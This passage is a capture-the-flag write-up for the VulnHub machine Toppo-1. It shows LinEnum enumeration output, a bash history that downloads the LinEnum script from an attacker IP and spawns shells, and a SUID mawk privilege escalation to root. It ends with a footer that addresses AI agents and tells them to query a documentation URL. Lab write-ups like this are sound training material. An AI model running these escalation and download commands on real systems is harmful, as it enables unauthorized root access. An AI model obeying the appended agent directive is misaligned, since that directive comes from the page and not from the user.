lrwxrwxrwx 1 root root 22 Apr 8 2017 procps.service -> systemd-sysctl.service lrwxrwxrwx 1 root root 16 Apr 8 2017 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Apr 8 2017 reboot.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Apr 8 2017 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Apr 8 2017 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Apr 8 2017 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Apr 8 2017 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Apr 8 2017 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Apr 8 2017 runlevel5.target -> graphical.target lrwxrwxrwx 1 root root 13 Apr 8 2017 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Apr 8 2017 sendsigs.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 stop-bootlogd-single.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Apr 8 2017 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Apr 8 2017 urandom.service -> systemd-random-seed.service lrwxrwxrwx 1 root root 9 Apr 8 2017 x11-common.service -> /dev/null -rw-r--r-- 1 root root 402 Apr 8 2017 debian-fixup.service -rw-r--r-- 1 root root 342 Apr 8 2017 getty-static.service -rw-r--r-- 1 root root 398 Apr 8 2017 hwclock-save.service -rw-r--r-- 1 root root 380 Apr 8 2017 ifup@.service -rw-r--r-- 1 root root 271 Apr 8 2017 systemd-setup-dgram-qlen.service -rw-r--r-- 1 root root 217 Apr 8 2017 udev-finish.service -rw-r--r-- 1 root root 770 Apr 8 2017 console-getty.service -rw-r--r-- 1 root root 741 Apr 8 2017 console-shell.service -rw-r--r-- 1 root root 783 Apr 8 2017 container-getty@.service -rw-r--r-- 1 root root 1010 Apr 8 2017 debug-shell.service -rw-r--r-- 1 root root 986 Apr 8 2017 emergency.service -rw-r--r-- 1 root root 1.5K Apr 8 2017 getty@.service -rw-r--r-- 1 root root 565 Apr 8 2017 halt-local.service -rw-r--r-- 1 root root 630 Apr 8 2017 initrd-cleanup.service -rw-r--r-- 1 root root 790 Apr 8 2017 initrd-parse-etc.service -rw-r--r-- 1 root root 640 Apr 8 2017 initrd-switch-root.service -rw-r--r-- 1 root root 664 Apr 8 2017 initrd-udevadm-cleanup-db.service -rw-r--r-- 1 root root 675 Apr 8 2017 kmod-static-nodes.service -rw-r--r-- 1 root root 473 Apr 8 2017 mail-transport-agent.target -rw-r--r-- 1 root root 635 Apr 8 2017 quotaon.service -rw-r--r-- 1 root root 633 Apr 8 2017 rc-local.service -rw-r--r-- 1 root root 954 Apr 8 2017 rescue.service -rw-r--r-- 1 root root 1.1K Apr 8 2017 serial-getty@.service -rw-r--r-- 1 root root 653 Apr 8 2017 systemd-ask-password-console.service -rw-r--r-- 1 root root 681 Apr 8 2017 systemd-ask-password-wall.service -rw-r--r-- 1 root root 776 Apr 8 2017 systemd-backlight@.service -rw-r--r-- 1 root root 1011 Apr 8 2017 systemd-binfmt.service -rw-r--r-- 1 root root 725 Apr 8 2017 systemd-fsck-root.service -rw-r--r-- 1 root root 678 Apr 8 2017 systemd-fsck@.service -rw-r--r-- 1 root root 544 Apr 8 2017 systemd-halt.service -rw-r--r-- 1 root root 501 Apr 8 2017 systemd-hibernate.service -rw-r--r-- 1 root root 710 Apr 8 2017 systemd-hostnamed.service -rw-r--r-- 1 root root 519 Apr 8 2017 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 480 Apr 8 2017 systemd-initctl.service -rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-journald.service -rw-r--r-- 1 root root 698 Apr 8 2017 systemd-journal-flush.service -rw-r--r-- 1 root root 557 Apr 8 2017 systemd-kexec.service -rw-r--r-- 1 root root 691 Apr 8 2017 systemd-localed.service -rw-r--r-- 1 root root 1.2K Apr 8 2017 systemd-logind.service -rw-r--r-- 1 root root 795 Apr 8 2017 systemd-machined.service -rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-modules-load.service -rw-r--r-- 1 root root 936 Apr 8 2017 systemd-networkd.service -rw-r--r-- 1 root root 685 Apr 8 2017 systemd-networkd-wait-online.service -rw-r--r-- 1 root root 605 Apr 8 2017 systemd-nspawn@.service -rw-r--r-- 1 root root 553 Apr 8 2017 systemd-poweroff.service -rw-r--r-- 1 root root 681 Apr 8 2017 systemd-quotacheck.service -rw-r--r-- 1 root root 769 Apr 8 2017 systemd-random-seed.service -rw-r--r-- 1 root root 841 Apr 8 2017 systemd-readahead-collect.service -rw-r--r-- 1 root root 638 Apr 8 2017 systemd-readahead-done.service -rw-r--r-- 1 root root 753 Apr 8 2017 systemd-readahead-replay.service -rw-r--r-- 1 root root 548 Apr 8 2017 systemd-reboot.service -rw-r--r-- 1 root root 824 Apr 8 2017 systemd-remount-fs.service -rw-r--r-- 1 root root 686 Apr 8 2017 systemd-resolved.service -rw-r--r-- 1 root root 758 Apr 8 2017 systemd-rfkill@.service -rw-r--r-- 1 root root 475 Apr 8 2017 systemd-shutdownd.service -rw-r--r-- 1 root root 497 Apr 8 2017 systemd-suspend.service -rw-r--r-- 1 root root 707 Apr 8 2017 systemd-sysctl.service -rw-r--r-- 1 root root 655 Apr 8 2017 systemd-timedated.service -rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-timesyncd.service -rw-r--r-- 1 root root 665 Apr 8 2017 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 770 Apr 8 2017 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 750 Apr 8 2017 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 826 Apr 8 2017 systemd-udevd.service -rw-r--r-- 1 root root 823 Apr 8 2017 systemd-udev-settle.service -rw-r--r-- 1 root root 715 Apr 8 2017 systemd-udev-trigger.service -rw-r--r-- 1 root root 757 Apr 8 2017 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 821 Apr 8 2017 systemd-update-utmp.service -rw-r--r-- 1 root root 588 Apr 8 2017 systemd-user-sessions.service -rw-r--r-- 1 root root 497 Apr 8 2017 user@.service -rw-r--r-- 1 root root 524 Apr 8 2017 basic.target -rw-r--r-- 1 root root 379 Apr 8 2017 bluetooth.target -rw-r--r-- 1 root root 394 Apr 8 2017 cryptsetup-pre.target -rw-r--r-- 1 root root 366 Apr 8 2017 cryptsetup.target -rw-r--r-- 1 root root 636 Apr 8 2017 dev-hugepages.mount -rw-r--r-- 1 root root 590 Apr 8 2017 dev-mqueue.mount -rw-r--r-- 1 root root 431 Apr 8 2017 emergency.target -rw-r--r-- 1 root root 440 Apr 8 2017 final.target -rw-r--r-- 1 root root 460 Apr 8 2017 getty.target -rw-r--r-- 1 root root 490 Apr 8 2017 graphical.target -rw-r--r-- 1 root root 487 Apr 8 2017 halt.target -rw-r--r-- 1 root root 447 Apr 8 2017 hibernate.target -rw-r--r-- 1 root root 468 Apr 8 2017 hybrid-sleep.target -rw-r--r-- 1 root root 553 Apr 8 2017 initrd-fs.target -rw-r--r-- 1 root root 526 Apr 8 2017 initrd-root-fs.target -rw-r--r-- 1 root root 691 Apr 8 2017 initrd-switch-root.target -rw-r--r-- 1 root root 671 Apr 8 2017 initrd.target -rw-r--r-- 1 root root 501 Apr 8 2017 kexec.target -rw-r--r-- 1 root root 395 Apr 8 2017 local-fs-pre.target -rw-r--r-- 1 root root 507 Apr 8 2017 local-fs.target -rw-r--r-- 1 root root 405 Apr 8 2017 machine.slice -rw-r--r-- 1 root root 492 Apr 8 2017 multi-user.target -rw-r--r-- 1 root root 464 Apr 8 2017 network-online.target -rw-r--r-- 1 root root 461 Apr 8 2017 network-pre.target -rw-r--r-- 1 root root 480 Apr 8 2017 network.target -rw-r--r-- 1 root root 514 Apr 8 2017 nss-lookup.target -rw-r--r-- 1 root root 473 Apr 8 2017 nss-user-lookup.target -rw-r--r-- 1 root root 354 Apr 8 2017 paths.target -rw-r--r-- 1 root root 500 Apr 8 2017 poweroff.target -rw-r--r-- 1 root root 377 Apr 8 2017 printer.target -rw-r--r-- 1 root root 693 Apr 8 2017 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 603 Apr 8 2017 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 493 Apr 8 2017 reboot.target -rw-r--r-- 1 root root 396 Apr 8 2017 remote-fs-pre.target -rw-r--r-- 1 root root 498 Apr 8 2017 remote-fs.target -rw-r--r-- 1 root root 486 Apr 8 2017 rescue.target -rw-r--r-- 1 root root 500 Apr 8 2017 rpcbind.target -rw-r--r-- 1 root root 402 Apr 8 2017 shutdown.target -rw-r--r-- 1 root root 362 Apr 8 2017 sigpwr.target -rw-r--r-- 1 root root 420 Apr 8 2017 sleep.target -rw-r--r-- 1 root root 403 Apr 8 2017 -.slice -rw-r--r-- 1 root root 409 Apr 8 2017 slices.target -rw-r--r-- 1 root root 380 Apr 8 2017 smartcard.target -rw-r--r-- 1 root root 356 Apr 8 2017 sockets.target -rw-r--r-- 1 root root 380 Apr 8 2017 sound.target -rw-r--r-- 1 root root 441 Apr 8 2017 suspend.target -rw-r--r-- 1 root root 353 Apr 8 2017 swap.target -rw-r--r-- 1 root root 681 Apr 8 2017 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 518 Apr 8 2017 sysinit.target -rw-r--r-- 1 root root 719 Apr 8 2017 sys-kernel-config.mount -rw-r--r-- 1 root root 662 Apr 8 2017 sys-kernel-debug.mount -rw-r--r-- 1 root root 1.3K Apr 8 2017 syslog.socket -rw-r--r-- 1 root root 646 Apr 8 2017 systemd-ask-password-console.path -rw-r--r-- 1 root root 574 Apr 8 2017 systemd-ask-password-wall.path -rw-r--r-- 1 root root 524 Apr 8 2017 systemd-initctl.socket -rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-journald-dev-log.socket -rw-r--r-- 1 root root 842 Apr 8 2017 systemd-journald.socket -rw-r--r-- 1 root root 635 Apr 8 2017 systemd-readahead-done.timer -rw-r--r-- 1 root root 555 Apr 8 2017 systemd-readahead-drop.service -rw-r--r-- 1 root root 528 Apr 8 2017 systemd-shutdownd.socket -rw-r--r-- 1 root root 450 Apr 8 2017 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 578 Apr 8 2017 systemd-udevd-control.socket -rw-r--r-- 1 root root 575 Apr 8 2017 systemd-udevd-kernel.socket -rw-r--r-- 1 root root 433 Apr 8 2017 system.slice -rw-r--r-- 1 root root 652 Apr 8 2017 system-update.target -rw-r--r-- 1 root root 355 Apr 8 2017 timers.target -rw-r--r-- 1 root root 395 Apr 8 2017 time-sync.target -rw-r--r-- 1 root root 661 Apr 8 2017 tmp.mount -rw-r--r-- 1 root root 417 Apr 8 2017 umount.target -rw-r--r-- 1 root root 392 Apr 8 2017 user.slice -rw-r--r-- 1 root root 366 Nov 21 2016 dbus.service -rw-r--r-- 1 root root 106 Nov 21 2016 dbus.socket -rw-r--r-- 1 root root 290 Dec 20 2015 rsyslog.service -rw-r--r-- 1 root root 251 May 14 2015 cron.service -rw-r--r-- 1 root root 283 Dec 28 2014 anacron-resume.service -rw-r--r-- 1 root root 183 Dec 28 2014 anacron.service -rw-r--r-- 1 root root 115 Nov 8 2014 acpid.path -rw-r--r-- 1 root root 199 Nov 8 2014 acpid.service -rw-r--r-- 1 root root 115 Nov 8 2014 acpid.socket -rw-r--r-- 1 root root 169 Sep 30 2014 atd.service /lib/systemd/system/dbus.target.wants: total 0 lrwxrwxrwx 1 root root 14 Nov 21 2016 dbus.socket -> ../dbus.socket /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Apr 8 2017 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Apr 8 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Apr 8 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service lrwxrwxrwx 1 root root 15 Nov 21 2016 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx 1 root root 30 Apr 8 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 34 Apr 8 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Apr 8 2017 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 27 Apr 8 2017 systemd-shutdownd.socket -> ../systemd-shutdownd.socket lrwxrwxrwx 1 root root 14 Nov 21 2016 dbus.socket -> ../dbus.socket /lib/systemd/system/apache2.service.d: total 4.0K -rw-r--r-- 1 root root 42 Mar 31 2018 forking.conf /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Apr 8 2017 getty-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Apr 8 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel1.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel2.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel3.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel4.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel5.target.wants: total 0 lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 24 Apr 8 2017 systemd-udevd.service -> ../systemd-udevd.service lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 22 Apr 8 2017 udev-finish.service -> ../udev-finish.service lrwxrwxrwx 1 root root 20 Apr 8 2017 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx 1 root root 23 Apr 8 2017 debian-fixup.service -> ../debian-fixup.service lrwxrwxrwx 1 root root 22 Apr 8 2017 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Apr 8 2017 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Apr 8 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Apr 8 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Apr 8 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Apr 8 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Apr 8 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Apr 8 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx 1 root root 27 Apr 8 2017 systemd-journald.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 32 Apr 8 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Apr 8 2017 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 37 Apr 8 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Apr 8 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 30 Apr 8 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service /lib/systemd/system/timers.target.wants: total 0 lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/networking.service.d: total 4.0K -rw-r--r-- 1 root root 84 Apr 8 2017 network-pre.conf /lib/systemd/network: total 12K -rw-r--r-- 1 root root 368 Apr 8 2017 80-container-host0.network -rw-r--r-- 1 root root 378 Apr 8 2017 80-container-ve.network -rw-r--r-- 1 root root 73 Apr 8 2017 99-default.link /lib/systemd/system-generators: total 412K -rwxr-xr-x 1 root root 46K Apr 8 2017 systemd-cryptsetup-generator -rwxr-xr-x 1 root root 30K Apr 8 2017 systemd-debug-generator -rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-default-display-manager-generator -rwxr-xr-x 1 root root 50K Apr 8 2017 systemd-fstab-generator -rwxr-xr-x 1 root root 30K Apr 8 2017 systemd-getty-generator -rwxr-xr-x 1 root root 70K Apr 8 2017 systemd-gpt-auto-generator -rwxr-xr-x 1 root root 34K Apr 8 2017 systemd-insserv-generator -rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-rc-local-generator -rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-system-update-generator -rwxr-xr-x 1 root root 54K Apr 8 2017 systemd-sysv-generator /lib/systemd/system-preset: total 4.0K -rw-r--r-- 1 root root 872 Apr 8 2017 90-systemd.preset /lib/systemd/system-shutdown: total 0 /lib/systemd/system-sleep: total 0 ### SOFTWARE ############################################# [-] Apache user configuration: APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data ### INTERESTING FILES #################################### [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1512 Apr 15 2018 /etc/passwd -rw-r--r-- 1 root root 759 Apr 15 2018 /etc/group -rw-r--r-- 1 root root 761 Oct 22 2014 /etc/profile -rw-r----- 1 root shadow 998 Apr 15 2018 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs -rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4 -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp -rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7 -rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at -rwsr-xr-x 1 root root 106908 Mar 23 2012 /usr/bin/mawk -rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn -rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail -rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount [+] Possibly interesting SUID files: -rwsr-xr-x 1 root root 106908 Mar 23 2012 /usr/bin/mawk [+] World-writable SUID files: -rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7 [+] World-writable SUID files owned by root: -rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7 [-] SGID files: -rwxr-sr-x 1 root shadow 34424 May 27 2017 /sbin/unix_chkpwd -rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab -rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall -rwxr-sr-x 1 root ssh 419192 Nov 19 2017 /usr/bin/ssh-agent -rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate -rwxr-sr-x 1 root shadow 61232 May 17 2017 /usr/bin/chage -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at -rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile -rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock -rwxr-sr-x 1 root mail 17880 Nov 18 2017 /usr/bin/lockfile -rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write -rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail -rwxr-sr-x 1 root shadow 21964 May 17 2017 /usr/bin/expiry [+] Files with POSIX capabilities set: /usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep /bin/ping6 = cap_net_raw+ep /bin/ping = cap_net_raw+ep [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 191 Sep 7 2014 /etc/libaudit.conf -rw-r--r-- 1 root root 2084 Mar 6 2015 /etc/sysctl.conf -rw-r--r-- 1 root root 24 May 17 04:21 /etc/resolv.conf -rw-r--r-- 1 root root 2584 Feb 7 2014 /etc/gai.conf -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf -rw-r--r-- 1 root root 206 Aug 12 2014 /etc/idmapd.conf -rw-r--r-- 1 root root 2969 Jun 17 2017 /etc/debconf.conf -rw-r--r-- 1 root root 2981 Apr 15 2018 /etc/adduser.conf -rw-r--r-- 1 root root 859 Nov 23 2012 /etc/insserv.conf -rw-r--r-- 1 root root 34 Apr 9 2017 /etc/ld.so.conf -rw-r--r-- 1 root root 604 May 15 2012 /etc/deluser.conf -rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf -rw-r--r-- 1 root root 144 Apr 15 2018 /etc/kernel-img.conf -rw-r--r-- 1 root root 956 Dec 27 2016 /etc/mke2fs.conf -rw-r--r-- 1 root root 7727 Apr 15 2018 /etc/ca-certificates.conf -rw-r--r-- 1 root root 552 Nov 12 2016 /etc/pam.conf -rw-r--r-- 1 root root 279 Jun 13 2013 /etc/updatedb.conf -rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf -rw-r--r-- 1 root root 1260 May 26 2014 /etc/ucf.conf -rw-r--r-- 1 root root 2632 Dec 14 2015 /etc/rsyslog.conf -rw-r--r-- 1 root root 346 Sep 1 2014 /etc/discover-modprobe.conf -rw-r--r-- 1 root root 3173 Jan 4 2015 /etc/reportbug.conf [-] Current user's history files: -rw------- 1 ted ted 1379 May 17 04:24 /home/ted/.bash_history [-] Location and contents (if accessible) of .bash_history file(s): /home/ted/.bash_history ls id whoami /bin/sh -i exit ls cd /home ls cd ted ls cd /home ls sudo -l clear ls which locate locate apache2 locate apache2.conf cd /etc/apache2/ clear ls cat apache2.conf clear ls ps -aux | grep root clear cd /tmp clear ls wget 192.168.43.182:8000/LinEnum.sh ls chmod +x LinEnum.sh ls ./LinEnum.sh locate www-data ls cd /var/www ls cd html ls cd admin ls cd .. cd mail ls cd .. cat post.html clear ls cd /usr/sbin/rpc.idmapd cd /usr/sbin/ ls /usr/sbin/rpc.idmapd cat /usr/sbin/rpc.idmapd clear locate http clea clear cd /var/www ls cd html ls cd vendo cd vendor/ ls cd ,, cd .. clear ls -la cd admin ls cat notes.txt ls -la cd .. | clear ls cd .. ls cat LICENSE cat gulpfile.js clear ls cd mail ls cat contact_me.php ls cd .. ls cd post cat post.html clear ls cd .. ls cd .. ls cd mail l ls cat www-data cd log cd . cd .. cd log ls cd apache2/ cd apt/ ls cat history.log cd .. ls clear ls cd .. ls cd www ls cd html ls ls-la ls -la clear ls cd in cat index.html clear ls less | strings contact.html | grep username less | cat contact.html | grep username less contact.html | grep username cat package-lock.json clear cat package-lock.json | grep username ls cat README.md clear cd .. cd /tmp ls ./LinEnum.sh cd /usr/bin/mawk cat /usr/bin/mawk clear ls awk 'BEGIN {system("/bin/sh")}' ./Line ./LinEnum.sh cear clear sudo -l mawk 'BEGIN {system("/bin/sh")}' exit [-] Location and Permissions (if accessible) of .bak file(s): -rw------- 1 root shadow 998 Apr 15 2018 /var/backups/shadow.bak -rw------- 1 root shadow 638 Apr 15 2018 /var/backups/gshadow.bak -rw------- 1 root root 1512 Apr 15 2018 /var/backups/passwd.bak -rw------- 1 root root 759 Apr 15 2018 /var/backups/group.bak [-] Any interesting mail in /var/mail: total 12 drwxrwsr-x 2 root mail 4096 May 17 03:13 . drwxr-xr-x 12 root root 4096 Apr 15 2018 .. -rw-rw---- 1 www-data mail 1553 May 17 03:13 www-data ### SCAN COMPLETE #################################### ``` ### SUID mawk ![](/files/-M7WzfLI0yjxJr6bBKeo) This is probably the vulnerability! After searching at this [site](https://gtfobins.github.io/gtfobins/mawk/), we can type this command to get root ``` mawk 'BEGIN {system("/bin/sh")}' ``` ![](/files/-M7X-18v7wftyZNX2ItW) Navigate to /root to get the flag ! ![](/files/-M7X-8n2BKMejr8r6jpD) Congratulation! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/toppo-1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.